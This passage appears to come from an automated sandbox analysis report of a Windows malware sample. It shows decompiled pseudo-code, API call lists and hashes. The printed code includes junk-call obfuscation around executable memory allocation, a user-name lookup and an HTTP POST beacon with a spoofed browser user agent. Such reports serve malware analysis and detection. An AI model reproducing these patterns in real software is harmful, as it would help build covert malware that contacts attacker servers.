                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44); // executed
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						AddFontResourceW(E00192D44);
                                            						_v72 = _v72 + 4;
                                            						 *0x194888 =  &(( *0x194888)[1]);
                                            					}
                                            					_t124 =  *0x194884; // 0xbfffc
                                            					_t127 = _t124 + _v32 - _v36 + 4;
                                            					_v24 = _t127;
                                            					_push(_v8);
                                            					_push(_v12);
                                            					_push(_v20);
                                            					_push(_v16);
                                            					_push( *0x194660);
                                            					_push(1);
                                            					_push(_v24);
                                            					return _t127;
                                            				} else {
                                            					_t315 =  *0x19488c; // 0x1fd0a4c
                                            					if(_t315[4] != 0x44) {
                                            						goto L3;
                                            					} else {
                                            						_t316 =  *0x19488c; // 0x1fd0a4c
                                            						if(_t316[6] == 0x65) {
                                            							return _t316;
                                            						} else {
                                            							goto L3;
                                            						}
                                            					}
                                            				}
                                            			}
                                            0x00192cf3
                                            0x00192cfd
                                            0x00192d06
                                            0x00192d11
                                            0x00192d14
                                            0x00192d17
                                            0x00192d1a
                                            0x00192d1d
                                            0x00192d20
                                            0x00192d23
                                            0x00192d29
                                            0x00192d2b
                                            0x00192d2e
                                            0x001923e1
                                            0x001923e1
                                            0x001923ea
                                            0x00000000
                                            0x001923ec
                                            0x001923ec
                                            0x001923f5
                                            0x00192d33
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x001923f5
                                            0x001923ea

                                            APIs
                                            • GetUserNameA.ADVAPI32(01FD0A4C,00194890), ref: 001923D1
                                            • GetUserNameA.ADVAPI32(01FD0A4C,00194890), ref: 0019240D
                                            • GetEnhMetaFileA.GDI32(00192D44), ref: 0019246E
                                            • GetEnhMetaFileA.GDI32(00192D44), ref: 00192478
                                            • VirtualAllocEx.KERNELBASE(000000FF,00000000,?,00001000,00000040), ref: 00192501
                                            • LoadCursorA.USER32 ref: 0019258E
                                            • DeleteObject.GDI32(00000000), ref: 001925A3
                                            • DeleteObject.GDI32(00000000), ref: 001925AC
                                            • AddFontResourceW.GDI32(00192D44), ref: 001925BF
                                            • AddFontResourceW.GDI32(00192D44), ref: 001925C9
                                            • AddFontResourceW.GDI32(00192D44), ref: 001925D3
                                            • AddFontResourceW.GDI32(00192D44), ref: 001925DD
                                            • AddFontResourceW.GDI32(00192D44), ref: 001925E7
                                            • AddFontResourceW.GDI32(00192D44), ref: 001925F1
                                            • AddFontResourceW.GDI32(00192D44), ref: 001925FB
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192605
                                            • AddFontResourceW.GDI32(00192D44), ref: 0019260F
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192619
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192623
                                            • AddFontResourceW.GDI32(00192D44), ref: 0019262D
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192637
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192641
                                            • AddFontResourceW.GDI32(00192D44), ref: 0019264B
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192655
                                            • AddFontResourceW.GDI32(00192D44), ref: 0019265F
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192669
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192673
                                            • AddFontResourceW.GDI32(00192D44), ref: 0019267D
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192687
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192691
                                            • AddFontResourceW.GDI32(00192D44), ref: 0019269B
                                            • AddFontResourceW.GDI32(00192D44), ref: 001926A5
                                            • AddFontResourceW.GDI32(00192D44), ref: 001926AF
                                            • AddFontResourceW.GDI32(00192D44), ref: 001926B9
                                            • AddFontResourceW.GDI32(00192D44), ref: 001926C3
                                            • AddFontResourceW.GDI32(00192D44), ref: 001926CD
                                            • AddFontResourceW.GDI32(00192D44), ref: 001926D7
                                            • AddFontResourceW.GDI32(00192D44), ref: 001926E1
                                            • AddFontResourceW.GDI32(00192D44), ref: 001926EB
                                            • AddFontResourceW.GDI32(00192D44), ref: 001926F5
                                            • AddFontResourceW.GDI32(00192D44), ref: 001926FF
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192709
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192713
                                            • AddFontResourceW.GDI32(00192D44), ref: 0019271D
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192727
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192731
                                            • AddFontResourceW.GDI32(00192D44), ref: 0019273B
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192745
                                            • AddFontResourceW.GDI32(00192D44), ref: 0019274F
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192759
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192763
                                            • AddFontResourceW.GDI32(00192D44), ref: 0019276D
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192777
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192781
                                            • AddFontResourceW.GDI32(00192D44), ref: 0019278B
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192795
                                            • AddFontResourceW.GDI32(00192D44), ref: 0019279F
                                            • AddFontResourceW.GDI32(00192D44), ref: 001927A9
                                            • AddFontResourceW.GDI32(00192D44), ref: 001927B3
                                            • AddFontResourceW.GDI32(00192D44), ref: 001927BD
                                            • AddFontResourceW.GDI32(00192D44), ref: 001927C7
                                            • AddFontResourceW.GDI32(00192D44), ref: 001927D1
                                            • AddFontResourceW.GDI32(00192D44), ref: 001927DB
                                            • AddFontResourceW.GDI32(00192D44), ref: 001927E5
                                            • AddFontResourceW.GDI32(00192D44), ref: 001927EF
                                            • AddFontResourceW.GDI32(00192D44), ref: 001927F9
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192803
                                            • AddFontResourceW.GDI32(00192D44), ref: 0019280D
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192817
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192821
                                            • AddFontResourceW.GDI32(00192D44), ref: 0019282B
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192835
                                            • AddFontResourceW.GDI32(00192D44), ref: 0019283F
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192849
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192853
                                            • AddFontResourceW.GDI32(00192D44), ref: 0019285D
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192867
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192871
                                            • AddFontResourceW.GDI32(00192D44), ref: 0019287B
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192885
                                            • AddFontResourceW.GDI32(00192D44), ref: 0019288F
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192899
                                            • AddFontResourceW.GDI32(00192D44), ref: 001928A3
                                            • AddFontResourceW.GDI32(00192D44), ref: 001928AD
                                            • AddFontResourceW.GDI32(00192D44), ref: 001928B7
                                            • AddFontResourceW.GDI32(00192D44), ref: 001928C1
                                            • AddFontResourceW.GDI32(00192D44), ref: 001928CB
                                            • AddFontResourceW.GDI32(00192D44), ref: 001928D5
                                            • AddFontResourceW.GDI32(00192D44), ref: 001928DF
                                            • AddFontResourceW.GDI32(00192D44), ref: 001928E9
                                            • AddFontResourceW.GDI32(00192D44), ref: 001928F3
                                            • AddFontResourceW.GDI32(00192D44), ref: 001928FD
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192907
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192911
                                            • AddFontResourceW.GDI32(00192D44), ref: 0019291B
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192925
                                            • AddFontResourceW.GDI32(00192D44), ref: 0019292F
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192939
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192943
                                            • AddFontResourceW.GDI32(00192D44), ref: 0019294D
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192957
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192961
                                            • AddFontResourceW.GDI32(00192D44), ref: 0019296B
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192975
                                            • AddFontResourceW.GDI32(00192D44), ref: 0019297F
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192989
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192993
                                            • AddFontResourceW.GDI32(00192D44), ref: 0019299D
                                            • AddFontResourceW.GDI32(00192D44), ref: 001929A7
                                            • AddFontResourceW.GDI32(00192D44), ref: 001929B1
                                            • AddFontResourceW.GDI32(00192D44), ref: 001929BB
                                            • AddFontResourceW.GDI32(00192D44), ref: 001929C5
                                            • LoadCursorA.USER32 ref: 001929D1
                                            • LoadCursorA.USER32 ref: 001929F3
                                            • LoadCursorA.USER32 ref: 00192A01
                                            • LoadCursorA.USER32 ref: 00192A0F
                                            • LoadCursorA.USER32 ref: 00192A1D
                                            • LoadCursorA.USER32 ref: 00192A2B
                                            • LoadCursorA.USER32 ref: 00192A39
                                            • LoadCursorA.USER32 ref: 00192A47
                                            • LoadCursorA.USER32 ref: 00192A55
                                            • LoadCursorA.USER32 ref: 00192A63
                                            • LoadCursorA.USER32 ref: 00192A71
                                            • LoadCursorA.USER32 ref: 00192A7F
                                            • LoadCursorA.USER32 ref: 00192A8D
                                            • LoadCursorA.USER32 ref: 00192A9B
                                            • LoadCursorA.USER32 ref: 00192AA9
                                            • LoadCursorA.USER32 ref: 00192AB7
                                            • LoadCursorA.USER32 ref: 00192AC5
                                            • LoadCursorA.USER32 ref: 00192AD3
                                            • LoadCursorA.USER32 ref: 00192AE1
                                            • LoadCursorA.USER32 ref: 00192AEF
                                            • LoadCursorA.USER32 ref: 00192AFD
                                            • LoadCursorA.USER32 ref: 00192B0B
                                            • LoadCursorA.USER32 ref: 00192B19
                                            • LoadCursorA.USER32 ref: 00192B27
                                            • LoadCursorA.USER32 ref: 00192B35
                                            • LoadCursorA.USER32 ref: 00192B43
                                            • LoadCursorA.USER32 ref: 00192B51
                                            • LoadCursorA.USER32 ref: 00192B5F
                                            • LoadCursorA.USER32 ref: 00192B6D
                                            • LoadCursorA.USER32 ref: 00192B7B
                                            • LoadCursorA.USER32 ref: 00192B89
                                            • LoadCursorA.USER32 ref: 00192B97
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192BAA
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192BB4
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192BBE
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192BC8
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192BD2
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192BDC
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192BE6
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192BF0
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192BFA
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192C04
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192C0E
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192C18
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192C22
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192C2C
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192C36
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192C40
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192C4A
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192C54
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192C5E
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192C68
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192C72
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192C7C
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192C86
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192C90
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192C9A
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192CA4
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192CAE
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192CB8
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192CC2
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192CCC
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192CD6
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192CE0
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192CEA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: FontResource$CursorLoad$DeleteFileMetaNameObjectUser$AllocVirtual
                                            • String ID: rrrrr${
                                            • API String ID: 4043527058-2199886882
                                            • Opcode ID: 11db343b1550c37be2ed7cd8cd3759bc56956f30d83a2b4490fb7b42f8cded01
                                            • Instruction ID: c45fedb27b011610254bddc63a94c4fdb1d44e940ef9d98aa547d597c784ef1b
                                            • Opcode Fuzzy Hash: 11db343b1550c37be2ed7cd8cd3759bc56956f30d83a2b4490fb7b42f8cded01
                                            • Instruction Fuzzy Hash: 341274626C4B45BEFB04B7E4DC83A9D76E2DB35F02F608011F1446AAE6DBF046854F22
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            C-Code - Quality: 65%
                                            			E00184A34(intOrPtr __eax) {
                                            				intOrPtr _v8;
                                            				void* _v12;
                                            				char _v15;
                                            				char _v17;
                                            				char _v18;
                                            				char _v22;
                                            				int _v28;
                                            				char _v289;
                                            				long _t44;
                                            				long _t61;
                                            				long _t63;
                                            				CHAR* _t70;
                                            				CHAR* _t72;
                                            				struct HINSTANCE__* _t78;
                                            				struct HINSTANCE__* _t84;
                                            				char* _t94;
                                            				void* _t95;
                                            				intOrPtr _t99;
                                            				struct HINSTANCE__* _t107;
                                            				void* _t110;
                                            				void* _t112;
                                            				intOrPtr _t113;
                                            
                                            				_t110 = _t112;
                                            				_t113 = _t112 + 0xfffffee0;
                                            				_v8 = __eax;
                                            				GetModuleFileNameA(0,  &_v289, 0x105);
                                            				_v22 = 0;
                                            				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
                                            				if(_t44 == 0) {
                                            					L3:
                                            					_push(_t110);
                                            					_push(0x184b39);
                                            					_push( *[fs:eax]);
                                            					 *[fs:eax] = _t113;
                                            					_v28 = 5;
                                            					E0018487C( &_v289, 0x105);
                                            					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E00184CA0, 0, 0,  &_v22,  &_v28) != 0) {
                                            						_v22 = 0;
                                            					}
                                            					_v18 = 0;
                                            					_pop(_t99);
                                            					 *[fs:eax] = _t99;
                                            					_push(E00184B40);
                                            					return RegCloseKey(_v12);
                                            				} else {
                                            					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
                                            					if(_t61 == 0) {
                                            						goto L3;
                                            					} else {
                                            						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
                                            						if(_t63 != 0) {
                                            							_push(0x105);
                                            							_push(_v8);
                                            							_push( &_v289);
                                            							L00181200();
                                            							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
                                            							_t107 = 0;
                                            							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
                                            								_t70 =  &_v289;
                                            								_push(_t70);
                                            								L00181208();
                                            								_t94 = _t70 +  &_v289;
                                            								while( *_t94 != 0x2e && _t94 !=  &_v289) {
                                            									_t94 = _t94 - 1;
                                            								}
                                            								_t72 =  &_v289;
                                            								if(_t94 != _t72) {
                                            									_t95 = _t94 + 1;
                                            									if(_v22 != 0) {
                                            										_push(0x105 - _t95 - _t72);
                                            										_push( &_v22);
                                            										_push(_t95);
                                            										L00181200();
                                            										_t107 = LoadLibraryExA( &_v289, 0, 2);
                                            									}
                                            									if(_t107 == 0 && _v17 != 0) {
                                            										_push(0x105 - _t95 -  &_v289);
                                            										_push( &_v17);
                                            										_push(_t95);
                                            										L00181200();
                                            										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
                                            										_t107 = _t78;
                                            										if(_t107 == 0) {
                                            											_v15 = 0;
                                            											_push(0x105 - _t95 -  &_v289);
                                            											_push( &_v17);
                                            											_push(_t95);
                                            											L00181200();
                                            											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
                                            											_t107 = _t84;
                                            										}
                                            									}
                                            								}
                                            							}
                                            							return _t107;
                                            						} else {
                                            							goto L3;
                                            						}
                                            					}
                                            				}
                                            			}


























                                            APIs
                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000105,01FD0A4C,0019309C), ref: 00184A50
                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,01FD0A4C,0019309C), ref: 00184A6E
                                            • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,01FD0A4C,0019309C), ref: 00184A8C
                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00184AAA
                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,00184B39,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00184AF3
                                            • RegQueryValueExA.ADVAPI32(?,00184CA0,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00184B39,?,80000001), ref: 00184B11
                                            • RegCloseKey.ADVAPI32(?,00184B40,00000000,?,?,00000000,00184B39,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00184B33
                                            • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00184B50
                                            • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00184B5D
                                            • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00184B63
                                            • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00184B8E
                                            • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00184BD5
                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00184BE5
                                            • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00184C0D
                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00184C1D
                                            • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 00184C43
                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 00184C53
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                            • String ID: .$Software\Borland\Delphi\Locales$Software\Borland\Locales
                                            • API String ID: 1759228003-3917250287
                                            • Opcode ID: 248188c0a6c007fdecbb14403866d3c373d37c622c768e8613ce63a3191c385b
                                            • Instruction ID: 5bbf229bff0086d69032d50d2e93fcba845d333eb2c22b743862bbef75746862
                                            • Opcode Fuzzy Hash: 248188c0a6c007fdecbb14403866d3c373d37c622c768e8613ce63a3191c385b
                                            • Instruction Fuzzy Hash: 20518572A4021D7BFB21EAE49C46FEFB7AD9B14740F5001A1BA04E6181EB74DF458FA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            C-Code - Quality: 100%
                                            			E001C28D0(char* _a4, CHAR* _a8, void* _a12, intOrPtr _a16, DWORD* _a20) {
                                            				void* _v8;
                                            				void* _v12;
                                            				signed short _v16;
                                            				signed int _v20;
                                            				void _v24;
                                            				void _v28;
                                            				void* _v32;
                                            				int _v36;
                                            				long _v40;
                                            				int _v44;
                                            				int _v48;
                                            				long _v52;
                                            				intOrPtr _v64;
                                            				char* _v68;
                                            				signed short _v88;
                                            				intOrPtr _v92;
                                            				char* _v96;
                                            				long _v100;
                                            				void* _v112;
                                            				char _v372;
                                            				char _v632;
                                            				void* _t86;
                                            				int _t90;
                                            				int _t100;
                                            				void* _t145;
                                            
                                            				E001C14A0( &_v112, 0, 0x3c);
                                            				_v112 = 0x3c;
                                            				_v96 =  &_v372;
                                            				_v92 = 0x104;
                                            				_v68 =  &_v632;
                                            				_v64 = 0x104;
                                            				_v36 = 0;
                                            				_v44 = lstrlenA("Content-Type: application/x-www-form-urlencoded");
                                            				 *((char*)(_t145 + 0xfffffffffffffe90)) = 0;
                                            				 *((char*)(_t145 + 0xfffffffffffffd8c)) = 0;
                                            				if(_a8 != 0) {
                                            					_v36 = lstrlenA(_a8);
                                            				}
                                            				if(InternetCrackUrlA(_a4, 0, 0,  &_v112) != 0) {
                                            					if(_v100 == 0) {
                                            						_v100 = 3;
                                            					}
                                            					if(_v100 == 3 || _v100 == 4) {
                                            						_v32 = E001C24F0();
                                            						if(_v32 != 0) {
                                            							_v16 = _v88;
                                            							_v20 = 0x84080100;
                                            							if(_v100 == 4) {
                                            								_v20 = _v20 | 0x00803000;
                                            							}
                                            							_t86 = InternetConnectA(_v32,  &_v372, _v16 & 0x0000ffff, 0, 0, 3, 0, 0); // executed
                                            							_v12 = _t86;
                                            							if(_v12 != 0) {
                                            								_v8 = HttpOpenRequestA(_v12, "POST",  &_v632, 0, 0, 0x1c7048, _v20, 0);
                                            								if(_v8 != 0) {
                                            									if(_v100 == 4) {
                                            										_v40 = 4;
                                            										InternetQueryOptionA(_v8, 0x1f,  &_v24,  &_v40);
                                            										_v24 = _v24 | 0x00001100;
                                            										InternetSetOptionA(_v8, 0x1f,  &_v24, 4);
                                            									}
                                            									_t90 = HttpSendRequestA(_v8, "Content-Type: application/x-www-form-urlencoded", _v44, _a8, _v36); // executed
                                            									_v48 = _t90;
                                            									_v28 = 0;
                                            									if(_v48 == 1) {
                                            										_v52 = 4;
                                            										HttpQueryInfoA(_v8, 0x20000013,  &_v28,  &_v52, 0);
                                            										if(_v28 == 0xc8 && _a12 != 0) {
                                            											_t100 = InternetReadFile(_v8, _a12, _a16 - 1, _a20); // executed
                                            											if(_t100 == 0 ||  *_a20 <= 0) {
                                            												 *_a20 = 0;
                                            											} else {
                                            												 *((char*)(_a12 +  *_a20)) = 0;
                                            											}
                                            										}
                                            									}
                                            									InternetCloseHandle(_v8);
                                            									InternetCloseHandle(_v12);
                                            									if(_v28 != 0xc8) {
                                            										return 0;
                                            									} else {
                                            										return 1;
                                            									}
                                            								}
                                            								InternetCloseHandle(_v12);
                                            								return 0;
                                            							} else {
                                            								return 0;
                                            							}
                                            						}
                                            						return 0;
                                            					} else {
                                            						return 0;
                                            					}
                                            				}
                                            				return 0;
                                            			}

                                            APIs
                                            • lstrlenA.KERNEL32(Content-Type: application/x-www-form-urlencoded), ref: 001C291C
                                            • lstrlenA.KERNEL32(00000000), ref: 001C294F
                                              • Part of subcall function 001C24F0: InternetOpenA.WININET(Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko,00000000,00000000,00000000,00000000), ref: 001C2509
                                            • InternetCrackUrlA.WININET(?,00000000,00000000,0000003C), ref: 001C2964
                                            • InternetConnectA.WININET(00000000,00000000,00000000,00000000,00000000,00000003,00000000,00000000), ref: 001C29E5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internet$lstrlen$ConnectCrackOpen
                                            • String ID: <$Content-Type: application/x-www-form-urlencoded$POST
                                            • API String ID: 4167639401-2842678110
                                            • Opcode ID: fab0480aefc9cb0db986b29a2591a64ac491b1640b691a0cba3d9f39c70d45cb
                                            • Instruction ID: 5d51aeca5bc3d052b8d7fa0451864f58e0981a0d1728caa4486b82a16e57dddb
                                            • Opcode Fuzzy Hash: fab0480aefc9cb0db986b29a2591a64ac491b1640b691a0cba3d9f39c70d45cb
                                            • Instruction Fuzzy Hash: 3B712A71A04209EFEB14DFA4CD59FEEBBB5BB68704F104529E605AB280D774DA84CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 122 184b40-184b71 lstrcpyn GetThreadLocale GetLocaleInfoA 123 184c5a-184c61 122->123 124 184b77-184b7b 122->124 125 184b7d-184b81 124->125 126 184b87-184b9d lstrlen 124->126 125->123 125->126 127 184ba0-184ba3 126->127 128 184baf-184bb7 127->128 129 184ba5-184bad 127->129 128->123 130 184bbd-184bc2 128->130 129->128 131 184b9f 129->131 132 184bec-184bee 130->132 133 184bc4-184bea lstrcpyn LoadLibraryExA 130->133 131->127 132->123 134 184bf0-184bf4 132->134 133->132 134->123 135 184bf6-184c26 lstrcpyn LoadLibraryExA 134->135 135->123 136 184c28-184c58 lstrcpyn LoadLibraryExA 135->136 136->123
                                            C-Code - Quality: 61%
                                            			E00184B40() {
                                            				void* _t28;
                                            				void* _t30;
                                            				struct HINSTANCE__* _t36;
                                            				struct HINSTANCE__* _t42;
                                            				char* _t51;
                                            				void* _t52;
                                            				struct HINSTANCE__* _t59;
                                            				void* _t61;
                                            
                                            				_push(0x105);
                                            				_push( *((intOrPtr*)(_t61 - 4)));
                                            				_push(_t61 - 0x11d);
                                            				L00181200();
                                            				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
                                            				_t59 = 0;
                                            				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
                                            					L14:
                                            					return _t59;
                                            				} else {
                                            					_t28 = _t61 - 0x11d;
                                            					_push(_t28);
                                            					L00181208();
                                            					_t51 = _t28 + _t61 - 0x11d;
                                            					L5:
                                            					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
                                            						_t51 = _t51 - 1;
                                            						goto L5;
                                            					}
                                            					_t30 = _t61 - 0x11d;
                                            					if(_t51 != _t30) {
                                            						_t52 = _t51 + 1;
                                            						if( *((char*)(_t61 - 0x12)) != 0) {
                                            							_push(0x105 - _t52 - _t30);
                                            							_push(_t61 - 0x12);
                                            							_push(_t52);
                                            							L00181200();
                                            							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
                                            						}
                                            						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
                                            							_push(0x105 - _t52 - _t61 - 0x11d);
                                            							_push(_t61 - 0xd);
                                            							_push(_t52);
                                            							L00181200();
                                            							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
                                            							_t59 = _t36;
                                            							if(_t59 == 0) {
                                            								 *((char*)(_t61 - 0xb)) = 0;
